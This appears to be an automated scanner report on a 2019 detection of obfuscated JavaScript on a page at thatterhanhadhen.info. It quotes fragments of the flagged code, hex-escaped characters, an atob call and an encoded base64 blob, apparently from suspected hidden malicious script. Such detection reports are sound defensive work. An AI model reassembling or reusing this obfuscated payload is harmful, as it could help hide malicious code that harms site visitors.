generic_javascript_obfuscation in thatterhanhadhen.info

On 2019-08-07T18:43:38.291102+00:00 we found suspicious pattern generic_javascript_obfuscation, type: Suspicious, (JavaScript obfuscation is frequently used to hide malicious code (or with hope to protect intellectual property)) in the page https://thatterhanhadhen.info/LJWNYDZ?t…

The suspicious code sample:

b'\\x61' … b'\\x61' … b'\\x64' … b'\\x65' … b'\\x75' … b'\\x67' … b'\\x72' … b'\\x69' … b'\\x74' … b'\\x6f' … b'\\x6e' … b'\\x28' … b'\\x78' … b'\\x21' … b'atob' … b'"UzFRc1IIE2ldZnEdc0RiagFkRXB/E3NfcGYFZkNjYghnQGBjBGNKamcDYUZwfxM3QmJrVWIVa34AYhVifgVmFzF+CWRHZ34BaBU2ZAdnRGI2VTNRfnFzF0olMhw3HT8max4bBCMEMAobJAEpBSMgW2ASZhRBYUckGVUVIx8iRwVBAQRuFEMEa2dmAzkZWBglGgR5IRw5Nkk1KiMFdzM8AxlLYQcNJmE7JQQZZwBRfnFSPRwhNhN9UTE/XiIWcH8TMh89IFRzX2J/E3NfcDBQIQcxO1BzX3BxHXNRfnETfRUzP0I0XzQyXSIWfggTIUJwfxMhQXB/EyFAcH8TIUdwfxMhRnB/EyFFcH8TIURwfxMhS3B/EyFKcH8TIUJicWx9RX5xQWlRfjVQPQA3f18kHz5/XyQfPn8TMh89IFRzXzQyXSIWfjVQPQA3f1cwHyE2HTcSPiBUfVExP14iFnAO"'

This feature is experimental so please feel free to contact us if you feel any of the reported issues is a false positive or you want to suggest a pattern that should be detected (we are using Yara standard).

Fully automated RESTful API is now available. Subscribe for your free trial today!